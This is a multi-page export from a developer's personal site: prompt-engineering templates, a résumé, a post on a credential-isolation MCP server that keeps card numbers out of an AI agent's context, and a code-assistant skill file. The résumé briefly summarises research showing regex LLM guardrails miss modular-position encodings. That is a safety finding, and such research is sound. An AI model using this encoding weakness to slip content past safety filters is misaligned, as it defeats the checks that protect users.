| Multiple phases with dependencies? | ReAct | Need validation between steps |
| Real tradeoff to evaluate? | Tree of Thoughts | Multiple valid approaches |
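The checklist can double as a tiny decision helper. A sketch, where the boolean flags are hypothetical names mirroring the checklist rows (not part of any tool):

```python
def suggest_patterns(task):
    """Map checklist answers to prompt patterns.

    `task` is a dict of booleans mirroring the checklist rows;
    this is an illustration of the table, not a real library.
    """
    rules = [
        ("needs_domain_expertise", "Persona"),
        ("easier_to_show_than_explain", "Few-shot"),
        ("format_matters", "Output format"),
        ("complex_reasoning", "Chain-of-Thought"),
        ("phased_with_dependencies", "ReAct"),
        ("real_tradeoff", "Tree of Thoughts"),
    ]
    return [pattern for flag, pattern in rules if task.get(flag)]

# A debugging task with strict output needs:
print(suggest_patterns({
    "needs_domain_expertise": True,
    "complex_reasoning": True,
    "format_matters": True,
}))  # ['Persona', 'Output format', 'Chain-of-Thought']
```

Each answered check adds one pattern; an empty result means a plain prompt is probably enough.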
### Copy-paste templates Debug code
```
You are a senior [language] developer.
Debug this error step by step:
1. Identify the root cause
2. Explain why it happens
3. Suggest the fix
4. Explain why the fix works
Error message:
[paste error]
Relevant code:
[paste code]
Environment: [language version, framework, OS]
```
Code review
```
You are a senior code reviewer focused on [maintainability/security/performance].
Review this code against:
- Error handling completeness
- Test coverage gaps
- Naming and style conventions
- Security concerns
Severity levels: MUST FIX / SHOULD FIX / NIT
Example:
MUST FIX (line 42): Missing null check.
userService.getUser() can return null but is
dereferenced without guard.
Code to review:
[paste code]
```
Write tests
```
You are a test engineer specializing in [framework].
Write tests for this code following these patterns:
Example test structure:
test('should [expected behavior]', () => {
// Arrange: [setup]
// Act: [execution]
// Assert: [verification]
});
Requirements:
- Cover happy path and at least 3 edge cases
- Include error scenarios
- Use descriptive test names
Code to test:
[paste code]
```
Architecture decision
```
You are a solutions architect.
I need to decide between [option A] and [option B]
for [specific use case].
Evaluate each option:
## Option A: [name]
- Pros: [list]
- Cons: [list]
- Effort: [hours/days]
- Risk: [Low/Medium/High]
- Maintenance burden: [description]
## Option B: [name]
[same structure]
Context:
- Team size: [N]
- Timeline: [deadline]
- Existing stack: [tech]
- Scale requirements: [metrics]
Recommend the best option with specific rationale
given my constraints.
```
Migration task
```
You are an expert [technology] migration engineer.
Migrate this code using these transformation rules:
Example:
Before: [old pattern]
After: [new pattern]
Example:
Before: [old pattern]
After: [new pattern]
Execute in phases:
Phase 1: [what to change first]
Validate: [how to verify]
Phase 2: [what to change next]
Validate: [how to verify]
Constraints:
- Preserve all existing behavior
- Do NOT change [specific things to protect]
- Must pass [existing tests/checks]
Code to migrate:
[paste code]
```
Spec-driven workflow (3 files)
**File 1: knowledge-base.md**
```
# Project Knowledge Base
## Domain Concepts
- [Term]: [Definition]
- [Term]: [Definition]
## Architectural Principles
- [Pattern]: [Rationale]
- Anti-patterns: [What to avoid]
## Constraints
- Technical: [list]
- Regulatory: [list]
- Organizational: [list]
## Past Decisions
- [Decision]: [Rationale] (Date: [when])
```
**File 2: specification.md**
```
# Feature Specification: [Name]
## Requirements
- [ ] Requirement 1
- [ ] Requirement 2
## Acceptance Criteria
- [ ] Criterion 1 (testable)
- [ ] Criterion 2 (testable)
## Edge Cases
- [Case 1]: [How to handle]
- [Case 2]: [How to handle]
## Out of Scope
- [What we're NOT doing]
```
**File 3: implementation-plan.md**
```
# Implementation Plan
## Phase 1: [Name]
THINK: [What must be true before we start?]
ACT: [Tasks]
CHECK: [Validation]
Effort: [Estimate]
## Phase 2: [Name]
THINK: [What did Phase 1 give us?]
ACT: [Tasks]
CHECK: [Validation]
Depends on: Phase 1
## Rollback Plan
If any phase fails: [recovery steps]
```
**Usage:** Load files 1, 2, 3 into the AI in that order. Then say: "Execute the implementation plan, following the knowledge base constraints and specification requirements."
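The load order can be automated. A minimal sketch, assuming the three files sit in one project directory; `build_prompt` is an illustrative helper, not part of any tool mentioned here:

```python
from pathlib import Path

EXECUTE = ("Execute the implementation plan, following the knowledge base "
           "constraints and specification requirements.")

def build_prompt(project_dir):
    """Concatenate the three spec files in dependency order, then the instruction."""
    parts = []
    for name in ("knowledge-base.md", "specification.md", "implementation-plan.md"):
        parts.append(Path(project_dir, name).read_text())
    parts.append(EXECUTE)
    return "\n\n---\n\n".join(parts)
```

The order matters: constraints, then requirements, then the plan, so the model reads context before it reads tasks.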
### Tool evaluation
New AI tools show up constantly. These are the questions I ask:
| Question | Why it matters |
| --- | --- |
| How old is it? | Longer track record = more failure learning |
| Who uses it beyond the creators? | Multi-company adoption is a stronger signal than star counts |
| Does it work across platforms? | Vendor lock-in is expensive to undo |
| What problem does it actually solve? | Distinguish genuinely new capability from repackaging |
| What's the exit cost? | Time to learn, data portability, switching pain |

| Maturity | Track Record | Action | Examples |
| --- | --- | --- | --- |
| Tier 1 | 10+ years, multi-company | Adopt | ADRs, few-shot, chain-of-thought, persona |
| Tier 2 | 1-3 years, growing adoption | Adopt with monitoring | .github/copilot-instructions.md, ReAct, Cursor |
| Tier 3 | Months, limited evidence | Experiment cautiously | GitHub spec-kit, Kiro, Tessl |
### Common mistakes
**Mistake:**
```
Fix this code
```
No context, no constraints, no format. The AI guesses at everything.
**Fix:**
```
You are a Python expert.
This code throws a KeyError
on line 10 when the user dict
is missing the 'email' field.
Explain the root cause and
suggest a fix that handles
missing keys gracefully.
```
**Mistake:** Over-specifying a persona with a paragraph of background. "You are an expert who has worked for 20 years in enterprise systems across multiple Fortune 500 companies and has deep knowledge of..."
**Fix:**
```
You are a senior database
performance engineer.
```
One line. The model doesn't need a resume.
**Mistake:** Providing 10 few-shot examples when 2-3 would establish the pattern.
**Fix:** 2-3 representative examples. Cover the main case and one edge case. Diminishing returns hit fast.
### Sources
| Paper | Pattern | Citation |
| --- | --- | --- |
| Prompt Pattern Catalog | Persona, Few-shot, Template, 16+ patterns | White et al. (2023) -- arXiv 2302.11382 |
| Few-Shot Learners | Few-shot prompting | Brown et al. (2020) -- arXiv 2005.14165 |
| Chain-of-Thought | Step-by-step reasoning | Wei et al. (2022) -- arXiv 2201.11903 |
| ReAct | Reasoning + Acting loops | Yao et al. (2022) -- arXiv 2210.03629 |
| Tree of Thoughts | Multi-branch evaluation | Yao et al. (2023) -- arXiv 2305.10601 |
| Architecture Decision Records | Systematic prompt organization | Nygard (2011) |
---
# resume.md
# https://jrlopez.dev/p/resume.html
---
title: "Resume"
description: "Sr. Data Engineer — 5 years financial services."
author: "Joey Lopez"
date: "2026-03-24"
tags: ["reference"]
atom_id: 22
source_html: "resume.html"
url: "https://jrlopez.dev/p/resume.html"
generated: true
---
# Joseph Lopez
Sr. Data Engineer · AI Researcher
Milwaukee, WI · [josephrobertlopez@gmail.com ]()· [jrlopez.dev ]()· [github ]()· [linkedin ]()
## Summary
Data engineer who publishes security research. I proved regex safety filters are algebraically blind (peer-reviewed, 2026) and built data pipelines handling 10,000+ datasets with zero consumer disruption. Five years across financial services — migrations, streaming, agentic systems. I like hard problems and tend to document what I learn.
## Research & Side Projects
**Algebraic and Computational Limits of LLM Guardrails** — Proved regex safety filters are algebraically blind to modular-position encodings via syntactic monoid analysis. 91 production patterns analyzed, 34/35 aperiodic. Peer-reviewed, 2026. [pdf ]()· [repo ]()· [teaching materials ]()
## Experience
**Senior Data Engineer — Platform & Integration** · Sep 2024 – Present · Financial Services (Milwaukee, WI)
- Wiring an acquired institution's personal loans product into the parent platform — real-time data feeds, payment processor history, GraphQL data product interlinking
- Designed an Airflow + config-as-code pipeline that moved **10,000+ payment processor datasets** during post-M&A integration; full audit trail throughout
- Replaced shell script ETL with production-grade infrastructure from scratch — **250 dataset migrations, zero consumer disruption**; release velocity jumped from 1–10 to 20–25 datasets per cycle
- Modernized 3 Databricks batch jobs covering 32 compliance datasets; config-driven validation toolkit cut dataset validation from 3 min → 30 sec (**~62 hours manual work eliminated**)
- Docker runtime workflows across 7 repos — saved **14+ person-days in 2 weeks**; one of 7 engineers selected for org-wide AI coding pilot
- Developed a spec-driven development methodology — **66% velocity increase**, adopted org-wide
**Senior Application Developer — Product Engineering** · Jan 2024 – Aug 2024 · Financial Services (Milwaukee, WI)
- Shipped credit-freeze data flow end-to-end across a distributed decision system
- Built a test-vetted UI for credit policy modelers — cut prototyping time from days to hours
- Found and fixed a Kafka consumer test suite that was passing without ever validating data — those tests were blind for months
- Led PySpark 2→3 migration of a production AWS Step Function ETL pipeline with no downtime
**AI Engineering & Developer Experience** · Oct 2025 – Present · Financial Services — Data Products / Platform
- Built a LangGraph multi-agent POC for developer onboarding — handles API discovery, schema comprehension, and code generation in a single workflow; cuts "how does this API work" from hours to minutes
- Designed and ran a Prompt Engineering Bootcamp — 2 sessions, 15 engineers, 7 patterns; published all materials as open-source teaching resources
- Mentored 2 junior devs — both shipped production-ready workflows independently within a month
**Application Developer — Data Engineering** · Aug 2021 – Dec 2023 · Financial Services (Milwaukee, WI)
- Built data streaming pipelines, implemented a DMN rules engine, and drove schema modernization across multiple platforms
- Designed multitenancy schema and data exhaust architecture for ETL pipelines
## Skills
- AI/Agentic: LangGraph, Multi-Agent Architectures, MCP, spec-driven development
- Python: Pytest, Pandas, PySpark, Airflow, LangGraph, Jupyter
- Java: Spring Boot, JUnit, Mockito, Microservices, Cucumber, Maven
- Go: Concurrency, goroutines, HTTP handlers, CLI tooling
- Scala: Spark
- Tools: SQL, AWS, GCP, Docker, OpenAPI, Splunk, GitHub, Jira, Confluence, Tableau, Claude Code, Windsurf
## Education & Certifications
B.S. Computer Science / Machine Learning — UC Irvine 2020 · 3.48 GPA
AWS Cloud Practitioner · GCP Associate Cloud Engineer
---
# secrets-router.md
# https://jrlopez.dev/p/secrets-router.html
---
title: "I Taught Claude to Pay My Water Bill"
description: "My card number ended up in the AI context window. So I built a credential isolation layer."
author: "Joey Lopez"
date: "2026-03-26"
tags: ["code", "security"]
atom_id: 27
source_html: "secrets-router.html"
url: "https://jrlopez.dev/p/secrets-router.html"
generated: true
---
# I Taught Claude to Pay My Water Bill
Then my card number ended up in its context window. So I built a tool.
March 2026
I asked my AI agent to pay my water bill. It did. $212.54 to Milwaukee Water Works, confirmation number and everything. Then I checked the conversation log. My full credit card number was sitting in plaintext inside the LLM's context window. The model had seen everything — card number, CVV, expiration. All of it logged in the session transcript.
## The Problem
If a credential passes through the model to reach the browser, the model has seen it. Period. No prompt engineering fixes this. The value is in the context window, in the tool call history, potentially in logs. The standard approach — "don't let agents handle credentials" — means agents can't do anything useful with real money, real accounts, or real APIs. That's not a solution. It's avoidance.
## The Insight
The fix isn't policy ("please don't remember my card number"). It's architecture. You need a **process boundary** between the agent and the credential values.
```
encrypted store ──→ secrets-router ──→ browser field
│
agent sees only:
handle:a3f8c2d1...
****1017
```
The agent sends a credential *reference *("use my primary card's number"). A separate process resolves it and fills the browser field directly via [Chrome DevTools Protocol ](). The value goes: Bitwarden → server memory → browser DOM. Zero agent hops.
## What I Built
[secrets-router ]() is an MCP server (~800 lines) that does three things:
- **Opaque handles.** `secure_fetch("rbw", "primary card", "number")` returns `handle:a3f8c2d1`. The agent sees the handle. Never the value.
- **CDP fill.** `secure_fill(handle, "#card-number")` resolves the handle inside the server process and fills the browser field via WebSocket. The agent sees "filled [MASKED ****1017]".
- **YAML recipes.** Multi-step workflows (navigate → fill → click → secure_fill → approve → submit) defined in YAML. The agent calls one tool. The server runs the whole flow.
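A toy version of the handle mechanism shows the shape of the boundary. This in-memory sketch simplifies the real tool's signatures (the actual `secure_fetch` takes a store, item, and field, and the value comes from Bitwarden, not the caller):

```python
import secrets

_store = {}  # handle -> secret value; lives only in the server process

def secure_fetch(value):
    """Store a secret; return an opaque handle -- never the value."""
    handle = "handle:" + secrets.token_hex(4)
    _store[handle] = value
    return handle

def secure_fill(handle):
    """Resolve the handle server-side; return only a masked percept."""
    value = _store[handle]
    # ...fill the browser field with `value` via CDP here...
    return {"status": "filled", "masked": "****" + value[-4:]}

h = secure_fetch("4111111111111017")
print(h)               # e.g. handle:a3f8c2d1
print(secure_fill(h))  # {'status': 'filled', 'masked': '****1017'}
```

Everything the agent ever receives is the handle string and the masked return; the raw value never crosses the process boundary.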
## The Human-Teaches-Once Pattern
**First time:** You do it manually while the agent watches. You say which fields are sensitive and which Bitwarden item to use. The agent generates a recipe.
**Second time:** The agent runs the recipe. You approve at the payment gate (screenshot + "confirm $216.68?").
**Every time after:** Autonomous. Confirmation number in your inbox.
## How the CDP Bridge Works
The hardest part was getting the credential from the MCP server into Playwright's browser without it passing through Claude's context. The MCP server and Playwright MCP are separate processes — they can't share memory. The solution: Chrome's `--remote-debugging-port` flag exposes a WebSocket endpoint. Any process can connect and execute JavaScript on the page:
```
# Find Playwright's browser
port = find_cdp_port() # scans process args
# Connect via WebSocket
ws = connect(f"ws://localhost:{port}/devtools/page/...")
# Fill the field — value never leaves this process
ws.send(runtime_evaluate(  # wraps CDP Runtime.evaluate
    f"document.querySelector('#card').value = '{card_number}'"
))
```
The card number exists only inside the `_cdp_fill_field()` function scope. After the field is filled, the variable goes out of scope. The MCP tool returns only `{"status": "filled", "masked": "****1017"}`.
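Under the hood, the WebSocket traffic is plain JSON-RPC. A sketch of constructing the Runtime.evaluate payload, with `json.dumps` doing the escaping into the JS expression (the message-building helper is illustrative, not code from the repo):

```python
import json

def evaluate_message(msg_id, selector, value):
    """Build a CDP Runtime.evaluate message that sets a field's value."""
    # json.dumps quotes and escapes both strings safely into the JS expression
    expression = (f"document.querySelector({json.dumps(selector)})"
                  f".value = {json.dumps(value)}")
    return json.dumps({
        "id": msg_id,
        "method": "Runtime.evaluate",
        "params": {"expression": expression},
    })

msg = evaluate_message(1, "#card", "4111111111111017")
```

Send that string over the DevTools WebSocket and Chrome evaluates the expression in the page; the value never appears anywhere but this process and the DOM.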
## The Recipe Format
```
credentials:
card:
store: rbw
item: "primary card"
fields:
number: number
cvv: cvv
steps:
- action: navigate
url: https://paywater.milwaukee.gov
- action: secure_fill
target: { selector: 'input[name="card"]' }
credential: card.number
percept: "filled: Card [MASKED ****${card.number|last4}]"
- action: await_approval
message: "Confirm payment of ${extract.total}?"
- action: click
target: { text: "Make a Payment" }
```
The recipe contains credential *references *, never values. Safe to commit to git. Safe to share. The agent reads the recipe, executes it, and sees only masked percepts at every step.
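Since a recipe should contain only references, leaks are cheap to lint for. A hypothetical pre-commit check (not part of the repo) that flags card-number-like digit runs:

```python
import re

CARD_LIKE = re.compile(r"\b\d{13,19}\b")  # PAN lengths per ISO/IEC 7812

def lint_recipe(text):
    """Return offending digit runs; a clean recipe holds references only."""
    return CARD_LIKE.findall(text)

safe = 'credential: card.number\npercept: "filled: Card [MASKED ****1017]"'
leaky = "value: 4111111111111111"
assert lint_recipe(safe) == []
assert lint_recipe(leaky) == ["4111111111111111"]
```

Masked percepts like `****1017` pass because four digits never match the PAN-length pattern; a pasted raw card number fails the check before it reaches git.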
## What's In the Repo
- `server.py` — MCP server with handle store, 5 credential backends, CDP fill
- `engine.py` — Recipe execution engine with approval gates
- `actuators/playwright_cdp.py` — Browser automation via Chrome DevTools Protocol
- `recipes/` — YAML recipe examples (bill pay, login, API call)
- `skills/` — 6 Claude Code skills (record, validate, debug, test, audit)
Supports [rbw ](), [Bitwarden CLI ](), [pass ](), age-encrypted YAML, and environment variables as credential backends. [github.com/josephrobertlopez/secrets-router ]() — MIT license, ~800 lines, zero frameworks.
---
# skills-dev-second-brain.md
# https://jrlopez.dev/p/skills-dev-second-brain.md
---
name: dev-second-brain
description: Developer second brain — interrogation-driven code assistance using systematic patterns (ReAct, spec-kit)
version: 1.0
---
# Developer Second Brain Skill
## Overview
The **Developer Second Brain** is an expert assistant that guides developers through complex code challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about your codebase before suggesting changes
2. **Structure gets rewarded** — Uses structured output (plans, diffs, tests) instead of loose prose
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for your codebase and team conventions
This skill enables developers to tackle:
- ✅ Code migrations (framework upgrades, language version bumps)
- ✅ Refactoring (extract service, decompose monolith)
- ✅ New feature implementation with existing conventions
- ✅ Systematic debugging approaches
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating code using a **20-question style interview** adapted for developers:
- **Codebase Context**: Framework, language version, architecture pattern
- **Target State**: Migration target, acceptance criteria, success metrics
- **Dependencies**: External libraries, team integrations, data pipelines
- **Test Coverage**: Existing test patterns, testing conventions
- **Team Conventions**: Naming, error handling, logging standards
### 2. ReAct Pattern Implementation
Generates migration plans with **THINK → ACT → OBSERVE** annotations:
```
THINK: What's the constraint here? (Analysis phase)
ACT: Here's the code change (Implementation)
OBSERVE: How do we verify? (Testing/validation)
```
### 3. Structured Output Formats
- **Implementation Plan**: Step-by-step with ReAct annotations
- **Code Diffs**: Side-by-side before/after with reasoning
- **Test Strategy**: Unit, integration, regression test cases
- **Checklist**: Verification steps before merge
---
## Usage Scenarios
Choose the scenario matching your current task:
### **Scenario A: Code Migration**
*Framework upgrade, language version bump, major dependency migration*
**When to use**: "I need to migrate from Framework A to B"
**What you'll get**: Migration plan, code diffs, test strategy, rollback plan
### **Scenario B: Refactoring**
*Extract service, decompose monolith, improve testability*
**When to use**: "I need to refactor this component"
**What you'll get**: Refactoring goals, dependency map, extraction plan, test approach
### **Scenario C: Feature Implementation**
*New feature using existing codebase conventions*
**When to use**: "I need to implement a new feature following our patterns"
**What you'll get**: Feature spec, code stubs with TODOs, test outline, integration points
### **Scenario D: Systematic Debugging**
*Track down root cause of production issue*
**When to use**: "I need to debug this systematic issue"
**What you'll get**: Hypothesis, investigation steps, diagnostic queries, solution options
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Current State Analysis (5-7 questions)
1. **Language & Framework**: What language/framework + version? (e.g., Python 3.11 + Django 4.2)
2. **Architecture Pattern**: What's the overall pattern? (Monolith, microservices, event-driven, layered?)
3. **Current Problem**: What specifically needs to change? (One sentence)
4. **Scope**: Is this one file, one module, or multiple services?
5. **Team Size**: How many developers? What's your role? (Individual contributor, tech lead, etc.)
### Phase 2: Target State Definition (3-4 questions)
6. **Success Criteria**: How will you know it's working? (Metrics, tests, deployment success?)
7. **Constraints**: Any hard constraints? (No downtime, budget limits, timeline?)
8. **Dependencies**: What other systems does this touch?
### Phase 3: Implementation Context (3-4 questions)
9. **Test Coverage**: Do you have existing tests? What's the pattern? (Unit, integration, e2e?)
10. **Team Conventions**: What's the naming convention? Error handling pattern? Logging standard?
11. **Review Process**: What does code review look like? (Automated checks, approval gates?)
12. **Rollback Plan**: What's your safety net if something goes wrong?
### Phase 4: Knowledge Gathering (2-3 questions)
13. **Similar Changes**: Have you done something like this before?
14. **Tribal Knowledge**: What does every developer wish they knew about this codebase?
15. **Decision Log**: Are there decisions that limit how you can change this?
---
## Output Format Specification
### 1. Implementation Plan with ReAct
```
## Migration Plan: [Component] from [Old] to [New]
### Phase 1: Preparation
**THINK**: What needs to be true before we start?
- [ ] Dependencies installed
- [ ] Tests passing
- [ ] Backup created
- [ ] Team notified
**ACT**: Run these commands:
\`\`\`bash
# Setup steps with exact commands
\`\`\`
**OBSERVE**: Verify with:
\`\`\`bash
# Verification commands
\`\`\`
### Phase 2: Core Change
**THINK**: What's changing and why?
- Breaking change X affects Y consumers
- New API requires Z configuration
- Database migration needed for schema
**ACT**: Apply these changes:
\`\`\`diff
- old_code()
+ new_code()
\`\`\`
**OBSERVE**: Test coverage:
- [ ] Unit test for new_code()
- [ ] Integration test for X→Y flow
- [ ] No regression in unchanged code
### Phase 3: Verification
**THINK**: How do we know this is safe?
**ACT**: Run full test suite
**OBSERVE**: Success criteria met
```
### 2. Code Diff with Annotations
```python
# THINK: Why are we changing this class?
# - Needs to support async operations
# - Current implementation blocks on I/O
# - Caller expects non-blocking behavior
# ACT: Before
class DataFetcher:
def get_data(self, url):
return requests.get(url).json()
# ACT: After
class DataFetcher:
async def get_data(self, url):
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
return await response.json()
# OBSERVE: Test this change:
# - Unit test: mock async response, verify await
# - Integration test: real async flow, verify non-blocking
# - Regression: old caller code still works (adapter if needed)
```
### 3. Test Strategy Matrix
```
| Component | Test Type | Approach | Coverage |
|-----------|-----------|----------|----------|
| DataFetcher | Unit | Mock async response | get_data returns parsed JSON |
| UserService | Integration | Real async client | User creation flow with I/O |
| API Handler | E2E | Load test | 100 concurrent requests |
| Rollback | Regression | Before/after comparison | No breaking changes |
```
### 4. Verification Checklist
```
## Pre-Deployment Checklist
### Code Quality
- [ ] Tests pass (unit + integration + e2e)
- [ ] Code review approved by [person/team]
- [ ] No new warnings in linter/type checker
- [ ] No security issues in dependency scan
- [ ] Documentation updated
### Performance & Stability
- [ ] Load test shows no degradation
- [ ] Error handling covers edge cases
- [ ] Logging added for debugging
- [ ] Monitoring/alerting updated
### Rollback Safety
- [ ] Rollback plan documented
- [ ] Migration is reversible (if database changes)
- [ ] Feature flag allows instant disable
- [ ] Previous version can run in parallel if needed
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to migrate from Python 3.9 to 3.12"
→ Scenario A (Code Migration)
"Our monolith is 50K lines, time to extract services"
→ Scenario B (Refactoring)
"Build user authentication module following our patterns"
→ Scenario C (Feature Implementation)
"Production is slow, need to find root cause"
→ Scenario D (Systematic Debugging)
```
### Step 2: Let the Skill Interrogate
The skill will ask 12-15 questions. **Answer fully** — this is where context richness happens.
Example interrogation flow:
```
Q1: What language/framework?
A: Python 3.9 with Django 3.2
Q2: What's the architecture pattern?
A: Monolithic Django app with background workers via Celery
Q3: What needs to change?
A: Move to Python 3.12 and Django 5.0, async views
Q4: Scope?
A: All 47 views in main app, plus celery tasks
Q5: How many developers?
A: Team of 5, I'm tech lead
[... continues through all 15 questions ...]
```
### Step 3: Review Generated Plan
The skill will output:
- ✅ Implementation plan with phases
- ✅ Code diffs with THINK/ACT/OBSERVE annotations
- ✅ Test strategy matrix
- ✅ Verification checklist
### Step 4: Execute with Confidence
Follow the plan step-by-step, using the checklist to verify each phase.
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate code without understanding:**
- What problem does this solve?
- What constraints exist?
- What conventions must be followed?
- What could break?
The interrogation phase ensures we have rich context before any code.
### Principle 2: Structure Over Prose
**Always output:**
- Structured plans (not narratives)
- Checklists (not suggestions)
- Diffs (not rewrites)
- Test cases (not "should work")
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Verification by Default
**Every change includes:**
- Why we're making it (THINK)
- The actual change (ACT)
- How to verify it works (OBSERVE)
ReAct pattern enforces safety.
### Principle 4: Team Conventions Matter
**Always respect:**
- Naming conventions
- Error handling patterns
- Logging standards
- Code review process
This is where interrogation questions pay dividends.
---
## Example: Complete Workflow
### Scenario: Feature Implementation
**You say:**
```
I need to add a new Payment Processing module to our existing system.
It should accept credit card and PayPal payments.
I want to follow our team's conventions.
```
**Skill interrogates (Phase 1: Current State):**
```
Q1: Language/framework?
→ "Python 3.11 + FastAPI"
Q2: Architecture?
→ "Microservices, async-first design"
Q3: Current structure?
→ "Other modules are in /services/, each with models.py, routes.py, tests/"
Q4: Scope?
→ "New module only, but touches Order service"
```
**Skill interrogates (Phase 2: Target State):**
```
Q5: Success criteria?
→ "Process payments, return confirmation, handle failures gracefully"
Q6: Constraints?
→ "No external payment service downtime allowed, must be testable"
Q7: Dependencies?
→ "Order service, Customer service, audit log service"
```
**Skill interrogates (Phase 3: Implementation Context):**
```
Q8: Test pattern?
→ "Pytest, mock external APIs, use fixtures for common objects"
Q9: Team conventions?
→ "Snake_case functions, async/await required, error logging with structured JSON"
Q10: Code review?
→ "PR requires approval + CI tests passing"
```
**Skill generates: Implementation Plan**
```markdown
## Payment Processing Module Implementation
### Phase 1: Setup
**THINK**: What's the minimal skeleton?
- FastAPI router
- Database models
- External API clients
**ACT**:
\`\`\`python
# services/payment_processing/models.py
from sqlalchemy import Column, Integer, String, Float, DateTime, ForeignKey
from sqlalchemy.orm import declarative_base
from datetime import datetime
Base = declarative_base()
class Payment(Base):
__tablename__ = "payments"
id = Column(Integer, primary_key=True)
order_id = Column(Integer, ForeignKey("orders.id"))
amount = Column(Float)
provider = Column(String) # credit_card, paypal
status = Column(String) # pending, completed, failed
created_at = Column(DateTime, default=datetime.utcnow)
# services/payment_processing/routes.py
from fastapi import APIRouter, HTTPException
import logging
router = APIRouter(prefix="/payments")
logger = logging.getLogger(__name__)
@router.post("/process")
async def process_payment(order_id: int, provider: str, amount: float):
"""Process payment through specified provider"""
# TODO: Validate input
# TODO: Call provider API
# TODO: Update Payment record
# TODO: Notify Order service
# TODO: Log with structured JSON
pass
# services/payment_processing/tests/test_routes.py
import pytest
from unittest.mock import patch, AsyncMock
@pytest.mark.asyncio
async def test_process_payment_success():
# TODO: Mock payment provider
# TODO: Assert payment recorded
# TODO: Assert order service notified
pass
@pytest.mark.asyncio
async def test_process_payment_provider_failure():
# TODO: Mock provider error
# TODO: Assert graceful failure
# TODO: Assert retry logic
pass
\`\`\`
**OBSERVE**: Verify structure exists:
\`\`\`bash
ls -la services/payment_processing/
# Should show: models.py, routes.py, tests/, __init__.py
pytest services/payment_processing/tests/ -v
# All tests should run (though skip actual implementations)
\`\`\`
```
**Skill generates: Code Diffs with Annotations**
```python
# THINK: Why do we need payment provider abstraction?
# - Support multiple providers (credit card, paypal, etc.)
# - Swap providers without changing business logic
# - Easy to test with mocks
# - Follows team's dependency injection pattern
# ACT: Before (monolithic payment)
def process_payment(order_id, card_number, cvv, amount):
response = requests.post("https://api.stripe.com/...", ...)
if response.status == 200:
update_order(order_id, "paid")
return response
# ACT: After (provider abstraction)
class PaymentProvider:
async def charge(self, amount: float) -> PaymentResult:
raise NotImplementedError
class StripeProvider(PaymentProvider):
async def charge(self, amount: float) -> PaymentResult:
result = await self.client.create_charge(amount=amount)
return PaymentResult(success=result.status == "succeeded", ...)
class PayPalProvider(PaymentProvider):
async def charge(self, amount: float) -> PaymentResult:
result = await self.client.create_payment(amount=amount)
return PaymentResult(success=result.state == "approved", ...)
async def process_payment(order_id: int, provider: PaymentProvider, amount: float):
"""Route payment through appropriate provider"""
result = await provider.charge(amount)
if result.success:
logger.info("payment_processed", extra={
"order_id": order_id,
"amount": amount,
"provider": provider.__class__.__name__
})
await order_service.mark_paid(order_id)
else:
logger.error("payment_failed", extra={
"order_id": order_id,
"reason": result.error
})
raise PaymentException(result.error)
return result
# OBSERVE: This design enables:
# - Unit test: mock PaymentProvider, verify logic
# - Integration test: real Stripe test account
# - Easy to add new provider: just implement interface
# - Follows team's dependency injection convention
```
**Skill generates: Test Strategy**
```
| Component | Test Type | Approach | Coverage |
|-----------|-----------|----------|----------|
| PaymentProvider (abstract) | Unit | Mock all implementations | Interface contract |
| StripeProvider | Unit | Mock Stripe API | charge() returns correct result |
| PayPalProvider | Unit | Mock PayPal API | charge() returns correct result |
| process_payment() | Unit | Mock providers | Success path, failure path |
| process_payment() + Order svc | Integration | Real test database, mock payment APIs | Full workflow |
| /process endpoint | E2E | Load test against test environment | 1000 concurrent requests |
```
**Skill generates: Verification Checklist**
```
## Pre-Merge Checklist
### Code Quality
- [ ] All tests pass: pytest services/payment_processing/
- [ ] Type checking passes: mypy services/payment_processing/
- [ ] Code review approved by [peer]
- [ ] No security issues (no hardcoded credentials, etc.)
- [ ] README added to explain module
### Functionality
- [ ] Happy path works: successful payment
- [ ] Error path works: provider failure handled
- [ ] Retry logic works: transient failures retry
- [ ] Audit logging works: all transactions logged with JSON
- [ ] Order service integration: payment status reflected
### Safety
- [ ] Rollback plan: Can disable module with feature flag
- [ ] No database migration needed (using base SQLAlchemy)
- [ ] Monitoring added: alert on payment failures
- [ ] Can run alongside old payment system
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map your development work to ABCD:
```
Action: Implement payment processing module (your feature)
Behavior: 100% test coverage, follows team conventions
Context: Supports multiple payment providers
Delivered: Rollback-safe, production-ready code
```
### Using with ReAct Pattern
Systematically debug production issues:
```
THINK: What could cause this error? (Hypothesis generation)
ACT: Add logging here, check this metric (Investigation)
OBSERVE: Does hypothesis hold? (Verification)
```
### Using with Tree of Thoughts
Complex architecture decisions:
```
Generate: Multiple refactoring approaches (extract service A, B, or C?)
Evaluate: Which respects team conventions best?
Choose: Option B because it aligns with event-driven pattern
```
---
## When to Use This Skill vs. IDE
| Task | Use IDE | Use Skill |
|------|---------|-----------|
| Syntax autocomplete | ✅ IDE | ❌ Overkill |
| Quick bug fix | ✅ IDE | ❌ Overkill |
| Variable rename across file | ✅ IDE refactoring | ❌ Use IDE |
| **Migrate framework** | ❌ Too complex | ✅ **This skill** |
| **Refactor large component** | ❌ Too many decisions | ✅ **This skill** |
| **New feature matching patterns** | ❌ Need context | ✅ **This skill** |
| **Root cause debugging** | ❌ Too many unknowns | ✅ **This skill** |
| **Code review for architecture** | ❌ Just guidance | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 2: Advanced Patterns** when discussing:
- ReAct pattern (THINK→ACT→OBSERVE)
- Real-world code examples
- Systematic problem-solving in technical domain
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "Developer" in a role-fork scenario
- You need to implement a feature quickly
- You're new to a codebase and need guidance
- You're debugging a systematic issue
**Expected outcome:**
- Understand how structured interrogation builds context
- See ReAct pattern in action with real code
- Generate production-ready code following team conventions
---
## FAQ
**Q: Will this skill generate all my code for me?**
A: No. It generates structure, plans, and guidance. You write the actual code, guided by the plan and diffs.
**Q: What if I don't know the answers to all 15 interrogation questions?**
A: That's fine! The skill will ask follow-up questions to clarify. The goal is to gather context, not quiz you.
**Q: How is this different from just asking an LLM to write code?**
